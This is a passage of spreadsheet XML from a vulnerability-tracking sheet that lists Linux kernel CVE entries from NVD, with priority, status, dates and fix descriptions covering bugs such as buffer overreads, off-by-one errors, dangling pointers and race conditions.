     From offset 0 this is the restored 10-byte NOP; the CALL opcode and
     displacement are now only NOP operands.  Offset 5 still decodes as
     CALL for a thread that was already there.
     Tthere is only a single target uprobe-trampoline for the given nop10
     instruction address, so the CALL instruction will not be changed across
     unoptimization/optimization cycles.
     Therefore, any task that is preempted at the CALL instruction is guaranteed
     to observe that CALL and not anything else.
Note as explained in [2] we need to use following nop10:
       PF1   PF2   ESC   NOPL  MOD   SIB   DISP32
NOP10: 0x66, 0x2e, 0x0f, 0x1f, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00 -- cs nopw 0x00000000(%rax,%rax,1)
which means we need to allow 0x2e prefix which maps to INAT_PFX_CS
attribute in is_prefix_bad function.
Also changing the uprobe syscall error when called out of uprobe
trampoline to -EPROTO, so we are able to detect the fixed kernel.
The optimized uprobe performance stays the same:
        uprobe-nop     :    3.129 ± 0.013M/s
        uprobe-push    :    3.045 ± 0.006M/s
        uprobe-ret     :    1.095 ± 0.004M/s
  --&gt;   uprobe-nop10   :    7.170 ± 0.020M/s
        uretprobe-nop  :    2.143 ± 0.021M/s
        uretprobe-push :    2.090 ± 0.000M/s
        uretprobe-ret  :    0.942 ± 0.000M/s
  --&gt;   uretprobe-nop10:    3.381 ± 0.003M/s
        usdt-nop       :    3.245 ± 0.004M/s
  --&gt;   usdt-nop10     :    7.256 ± 0.023M/s
[1] https://lore.kernel.org/bpf/20260509003146.976844-1-andrii@kernel.org/
[2] https://lore.kernel.org/bpf/20260518104306.GU3102624@noisy.programming.kicks-ass.net/#t</t>
        </is>
      </c>
      <c r="T981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93164</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93165</t>
        </is>
      </c>
      <c r="D982" s="5" t="inlineStr"/>
      <c r="E982" s="5" t="inlineStr"/>
      <c r="F982" s="5" t="inlineStr"/>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="inlineStr"/>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr"/>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q982" s="5" t="inlineStr"/>
      <c r="R982" s="5" t="inlineStr"/>
      <c r="S982" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: sensorhub: Fix memory overread in ring handler
`max_response` and `sensor_num` are read from different EC commands:
- `max_response` is from cros_ec_get_proto_info().
    ec_dev-&gt;max_response = info-&gt;max_response_packet_size -
                                    sizeof(struct ec_host_response);
- `sensor_num` is from cros_ec_get_sensor_count().
    sensor_num = cros_ec_get_sensor_count(ec);
With a malfunctioning EC firmware, it is possible that the `msg-&gt;insize`
(i.e., `fifo_info_length` in the context) could be clamped in
cros_ec_cmd_xfer() because `msg-&gt;insize` is greater than `max_response`.
    int fifo_info_length =
            sizeof(struct ec_response_motion_sense_fifo_info) +
            sizeof(u16) * sensorhub-&gt;sensor_num;
This means the number of read bytes could be less than expected.  As a
result, the subsequent memcpy() in cros_ec_sensorhub_ring_handler()
overreads the `resp-&gt;fifo_info` buffer.
Check the return value of cros_ec_cmd_xfer_status() and abort if the
number of bytes read does not match the expected length.</t>
        </is>
      </c>
      <c r="T982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93165</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93166</t>
        </is>
      </c>
      <c r="D983" s="5" t="inlineStr"/>
      <c r="E983" s="5" t="inlineStr"/>
      <c r="F983" s="5" t="inlineStr"/>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="inlineStr"/>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr"/>
      <c r="L983" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q983" s="5" t="inlineStr"/>
      <c r="R983" s="5" t="inlineStr"/>
      <c r="S983" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtw89: debug: fix off by on in rtw89_ppdu_str()
This &gt; comparison should be &gt;= to avoid an out of bounds access.</t>
        </is>
      </c>
      <c r="T983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93166</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93167</t>
        </is>
      </c>
      <c r="D984" s="5" t="inlineStr"/>
      <c r="E984" s="5" t="inlineStr"/>
      <c r="F984" s="5" t="inlineStr"/>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="inlineStr"/>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr"/>
      <c r="L984" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O984" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P984" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q984" s="5" t="inlineStr"/>
      <c r="R984" s="5" t="inlineStr"/>
      <c r="S984" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
csky: Fix a4/a5 restoration in syscall trace path
The syscall trace path reloads syscall arguments from pt_regs before
calling the syscall handler. On C-SKY ABIv2, the 5th and 6th syscall
arguments are prepared as stack arguments before invoking syscallid.
The current code adjusts sp before loading LSAVE_A4 and LSAVE_A5. Since
those offsets are relative to the original pt_regs base, loading them
after changing sp fetches the wrong slots. As a result, traced syscalls
that use the 5th or 6th argument may receive corrupted arguments.
This is visible with mmap2(), which takes six arguments. A small
PTRACE_SYSCALL reproducer opens a file and maps one page with:
  mmap(NULL, 4096, PROT_READ | PROT_EXEC, MAP_PRIVATE, fd, 0)
Before the fix, the traced child fails the mmap and exits with 12.
After the fix, the mapping succeeds and the child exits with 0.
Fix the trace path by loading a4/a5 from pt_regs before changing sp.
Tested on: ck860f, linux-4.19.15, C-SKY abiv2</t>
        </is>
      </c>
      <c r="T984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93167</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93168</t>
        </is>
      </c>
      <c r="D985" s="5" t="inlineStr"/>
      <c r="E985" s="5" t="inlineStr"/>
      <c r="F985" s="5" t="inlineStr"/>
      <c r="G985" s="5" t="inlineStr"/>
      <c r="H985" s="5" t="inlineStr"/>
      <c r="I985" s="5" t="inlineStr"/>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr"/>
      <c r="L985" s="5" t="inlineStr"/>
      <c r="M985" s="5" t="inlineStr"/>
      <c r="N985" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O985" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P985" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q985" s="5" t="inlineStr"/>
      <c r="R985" s="5" t="inlineStr"/>
      <c r="S985" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: xilinx_dma: Fix CPU stall in xilinx_dma_poll_timeout
Currently when calling xilinx_dma_poll_timeout with delay_us=0 and a
condition that is never fulfilled, the CPU busy-waits for prolonged time
and the timeout triggers only with a massive delay causing a CPU stall.
This happens due to a huge underestimation of wall clock time in
poll_timeout_us_atomic. Commit 7349a69cf312 ("iopoll: Do not use
timekeeping in read_poll_timeout_atomic()") changed the behavior to no
longer use ktime_get at the expense of underestimation of wall clock
time which appears to be very large for delay_us=0. Instead of timing
out after approximately XILINX_DMA_LOOP_COUNT microseconds, the timeout
takes XILINX_DMA_LOOP_COUNT * 1000 * (time that the overhead of the for
loop in poll_timeout_us_atomic takes) which is in the range of several
minutes for XILINX_DMA_LOOP_COUNT=1000000. Fix this by using a non-zero
value for delay_us. Use delay_us=10 to keep the delay in the hot path of
starting DMA transfers minimal but still avoid CPU stalls in case of
unexpected hardware failures.
One-off measurement with delay_us=0 causes the cpu to busy wait around 7
minutes in the timeout case. After applying this patch with delay_us=10
the measured timeout was 1053428 microseconds which is roughly
equivalent to the expected 1000000 microseconds specified in
XILINX_DMA_LOOP_COUNT.
Add a constant XILINX_DMA_POLL_DELAY_US for delay_us value.</t>
        </is>
      </c>
      <c r="T985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93168</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93169</t>
        </is>
      </c>
      <c r="D986" s="5" t="inlineStr"/>
      <c r="E986" s="5" t="inlineStr"/>
      <c r="F986" s="5" t="inlineStr"/>
      <c r="G986" s="5" t="inlineStr"/>
      <c r="H986" s="5" t="inlineStr"/>
      <c r="I986" s="5" t="inlineStr"/>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr"/>
      <c r="L986" s="5" t="inlineStr"/>
      <c r="M986" s="5" t="inlineStr"/>
      <c r="N986" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O986" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P986" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q986" s="5" t="inlineStr"/>
      <c r="R986" s="5" t="inlineStr"/>
      <c r="S986" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: zynqmp_dma: fix race between runtime PM and device removal
In zynqmp_dma_remove(), runtime PM was disabled only after checking
state and doing a manual suspend. This can race with runtime PM in the
remove/unbind (rmmod) path.
Disable runtime PM first, then suspend only if the device is not already
suspended. To prevent any further runtime PM transitions.</t>
        </is>
      </c>
      <c r="T986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93169</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93170</t>
        </is>
      </c>
      <c r="D987" s="5" t="inlineStr"/>
      <c r="E987" s="5" t="inlineStr"/>
      <c r="F987" s="5" t="inlineStr"/>
      <c r="G987" s="5" t="inlineStr"/>
      <c r="H987" s="5" t="inlineStr"/>
      <c r="I987" s="5" t="inlineStr"/>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr"/>
      <c r="L987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q987" s="5" t="inlineStr"/>
      <c r="R987" s="5" t="inlineStr"/>
      <c r="S987" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: xilinx_dma: Fix channel idle state management in AXIDMA and MCDMA interrupt handlers
Fix a race condition in AXIDMA and MCDMA irq handlers where the channel
could be incorrectly marked as idle and attempt spurious transfers when
descriptors are still being processed.
The issue occurs when:
1. Multiple descriptors are queued and active.
2. An interrupt fires after completing some descriptors.
3. xilinx_dma_complete_descriptor() moves completed descriptors to
done_list.
4. Channel is marked idle and start_transfer() is called even though
   active_list still contains unprocessed descriptors.
5. This leads to premature transfer attempts and potential descriptor
   corruption or missed completions.
Only mark the channel as idle and start new transfers when the active list
is actually empty, ensuring proper channel state management and avoiding
spurious transfer attempts.</t>
        </is>
      </c>
      <c r="T987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93170</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93171</t>
        </is>
      </c>
      <c r="D988" s="5" t="inlineStr"/>
      <c r="E988" s="5" t="inlineStr"/>
      <c r="F988" s="5" t="inlineStr"/>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="inlineStr"/>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr"/>
      <c r="L988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q988" s="5" t="inlineStr"/>
      <c r="R988" s="5" t="inlineStr"/>
      <c r="S988" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
leds: lp5860: Fix a potential double-unlock
In lp5860_device_init(), if lp5860_init_dt() fails, an already unlocked
mutex is unlocked another time.
Slightly rework how the lock is taken/released to avoid this potential
double unlock.</t>
        </is>
      </c>
      <c r="T988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93171</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93172</t>
        </is>
      </c>
      <c r="D989" s="5" t="inlineStr"/>
      <c r="E989" s="5" t="inlineStr"/>
      <c r="F989" s="5" t="inlineStr"/>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="inlineStr"/>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr"/>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q989" s="5" t="inlineStr"/>
      <c r="R989" s="5" t="inlineStr"/>
      <c r="S989" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mm_init: handle alloc_percpu failure in free_area_init_core_hotplug
We miss a failed allocation check for pgdat-&gt;per_cpu_nodestats, which
results in a NULL deref when we offset into the per-cpu area.
Propagate -ENOMEM up the stack and leave per_cpu_nodestats pointing
at boot_nodestats so a later online can retry the allocation.
hotadd_init_pgdat() returns NULL on failure, which __try_online_node()
already maps to -ENOMEM.
On failure nothing needs to be unwound:
  - the node is never marked online
  - per_cpu_nodestats is left pointing at boot_nodestats
  - __add_memory_resource() cleans up pending memblock resources
  - later online attempts retry the per_cpu_nodestats allocation</t>
        </is>
      </c>
      <c r="T989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93172</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93173</t>
        </is>
      </c>
      <c r="D990" s="5" t="inlineStr"/>
      <c r="E990" s="5" t="inlineStr"/>
      <c r="F990" s="5" t="inlineStr"/>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="inlineStr"/>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr"/>
      <c r="L990" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q990" s="5" t="inlineStr"/>
      <c r="R990" s="5" t="inlineStr"/>
      <c r="S990" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf,lsm: Drop bpf_prog_free from sleepable_lsm_hooks
__bpf_prog_put_rcu() is the call_rcu() callback for non-sleepable programs.
security_bpf_prog_free() called from there fires bpf_prog_free in softirq;
if a sleepable LSM prog is attached to that hook, might_fault() BUGs:
  BUG: sleeping function called from invalid context
  in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 5038
  preempt_count: 101, expected: 0
  Call Trace:
   &lt;IRQ&gt;
   __bpf_prog_enter_sleepable+0x1cd/0x320 kernel/bpf/trampoline.c:1255
   bpf_trampoline_6442549705+0x53/0xd7
   security_bpf_prog_free+0xde/0x130 security/security.c:5465
   __bpf_prog_put_rcu+0xab/0xd0 kernel/bpf/syscall.c:2365
   rcu_do_batch kernel/rcu/tree.c:2617 [inline]
   handle_softirqs+0x236/0x800 kernel/softirq.c:622
   &lt;/IRQ&gt;
The call_rcu/call_rcu_tasks_trace split reflects the freed program's
sleepability, not that of any attached observer.
security_bpf_prog_free() also frees prog-&gt;aux-&gt;security, which has to stay
after the grace period, so drop bpf_prog_free from sleepable_lsm_hooks
rather than move the call. Non-sleepable observers still run there.</t>
        </is>
      </c>
      <c r="T990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93173</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93174</t>
        </is>
      </c>
      <c r="D991" s="5" t="inlineStr"/>
      <c r="E991" s="5" t="inlineStr"/>
      <c r="F991" s="5" t="inlineStr"/>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="inlineStr"/>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr"/>
      <c r="L991" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q991" s="5" t="inlineStr"/>
      <c r="R991" s="5" t="inlineStr"/>
      <c r="S991" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Copy per-CPU map value padding in copy_map_value_long()
In kernel, per-CPU map elements are stored with
round_up(map-&gt;value_size, 8) bytes. On UAPI lookup paths, it copies the
rounded size for each CPU into a temporary buffer.
However, copy_map_value_long() passes 'map-&gt;value_size' to
bpf_obj_memcpy(). When the map has special fields, bpf_obj_memcpy() copies
around those fields with memcpy(), and does not copy the tail padding
between 'map-&gt;value_size' and round_up(map-&gt;value_size, 8).
The temporary UAPI lookup buffers are allocated without __GFP_ZERO. As a
result, when the per-CPU map's value size is not equal to
round_up(map-&gt;value_size, 8), UAPI LOOKUP_ELEM and its variants can return
stale heap contents from that padding to user space. The same issue
applies to bpf_iter for per-CPU maps.
Pass round_up(map-&gt;value_size, 8) to bpf_obj_memcpy() from
copy_map_value_long(), so per-CPU maps both with and without special
fields copy the entire per-CPU slot. Remove the now redundant round_up()
from bpf_obj_memcpy()'s long_memcpy path.</t>
        </is>
      </c>
      <c r="T991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93174</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93175</t>
        </is>
      </c>
      <c r="D992" s="5" t="inlineStr"/>
      <c r="E992" s="5" t="inlineStr"/>
      <c r="F992" s="5" t="inlineStr"/>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="inlineStr"/>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr"/>
      <c r="L992" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q992" s="5" t="inlineStr"/>
      <c r="R992" s="5" t="inlineStr"/>
      <c r="S992" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix dangling pointer in CRTC reset function
amdgpu_dm_crtc_reset_state() frees the old state before allocating
a new one. If kzalloc() fails, the function returns without updating
the state pointer, leaving a dangling pointer to already freed memory.
Fix this by allocating the new state first. On allocation failure, the
old state remains untouched and the function safely returns.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[adjust for movement around current amd-staging-drm-next]</t>
        </is>
      </c>
      <c r="T992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93175</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93176</t>
        </is>
      </c>
      <c r="D993" s="5" t="inlineStr"/>
      <c r="E993" s="5" t="inlineStr"/>
      <c r="F993" s="5" t="inlineStr"/>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="inlineStr"/>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr"/>
      <c r="L993" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q993" s="5" t="inlineStr"/>
      <c r="R993" s="5" t="inlineStr"/>
      <c r="S993" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix dangling pointer in plane reset function
amdgpu_dm_plane_drm_plane_reset() frees the old state before allocating
a new one. If kzalloc() fails, the function returns without updating
the state pointer, leaving a dangling pointer to already freed memory.
Fix this by allocating the new state first. On allocation failure, the
old state remains untouched and the function safely returns.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
[adjust for movement around current amd-staging-drm-next]</t>
        </is>
      </c>
      <c r="T993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93176</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93177</t>
        </is>
      </c>
      <c r="D994" s="5" t="inlineStr"/>
      <c r="E994" s="5" t="inlineStr"/>
      <c r="F994" s="5" t="inlineStr"/>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="inlineStr"/>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr"/>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q994" s="5" t="inlineStr"/>
      <c r="R994" s="5" t="inlineStr"/>
      <c r="S994" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/pm/powerplay: bounds-check voltage index in Vega10 lookup
vddInd, vddciInd and mvddInd from VBIOS-parsed tables index into vddc,
vddci and vddmem lookup tables without bounds checks across nine sites.
Return -EINVAL when any index is out of range.</t>
        </is>
      </c>
      <c r="T994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93177</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93178</t>
        </is>
      </c>
      <c r="D995" s="5" t="inlineStr"/>
      <c r="E995" s="5" t="inlineStr"/>
      <c r="F995" s="5" t="inlineStr"/>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="inlineStr"/>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr"/>
      <c r="L995" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q995" s="5" t="inlineStr"/>
      <c r="R995" s="5" t="inlineStr"/>
      <c r="S995" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/pm/powerplay: bounds-check voltage index in SMU7 lookup
vddInd and vddcInd fields from VBIOS-parsed tables are used to index into
voltage lookup tables without a bounds check. Return -EINVAL when any
index is out of range.</t>
        </is>
      </c>
      <c r="T995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93178</t>
